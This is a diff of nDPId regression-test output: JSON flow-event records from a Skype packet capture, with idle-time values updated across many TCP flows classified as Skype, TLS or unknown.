00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970685835,"flow_last_seen":1431970687666,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59052,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970666903,"flow_last_seen":1431970694687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970666903,"flow_last_seen":1431970694687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970666903,"flow_last_seen":1431970694687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970666903,"flow_last_seen":1431970694687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970679839,"flow_last_seen":1431970706168,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970673966,"flow_last_seen":1431970700297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970673966,"flow_last_seen":1431970700297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970673966,"flow_last_seen":1431970700297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970673966,"flow_last_seen":1431970700297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970636300,"flow_last_seen":1431970662705,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -1178,21 +1178,21 @@ 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970679839,"flow_last_seen":1431970706169,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970655836,"flow_last_seen":1431970685642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970655836,"flow_last_seen":1431970685642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970694308,"flow_last_seen":1431970701362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970694308,"flow_last_seen":1431970701362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970695909,"flow_last_seen":1431970700948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970695909,"flow_last_seen":1431970700948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1431970637197,"flow_last_seen":1431970705557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15399,"flow_avg_l4_payload_len":202,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970655836,"flow_last_seen":1431970685642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970655836,"flow_last_seen":1431970685642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970694308,"flow_last_seen":1431970701362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970694308,"flow_last_seen":1431970701362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970695909,"flow_last_seen":1431970700948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970695909,"flow_last_seen":1431970700948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1431970637197,"flow_last_seen":1431970705557,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15399,"flow_avg_l4_payload_len":202,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970634432,"flow_last_seen":1431970687929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970634431,"flow_last_seen":1431970687929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
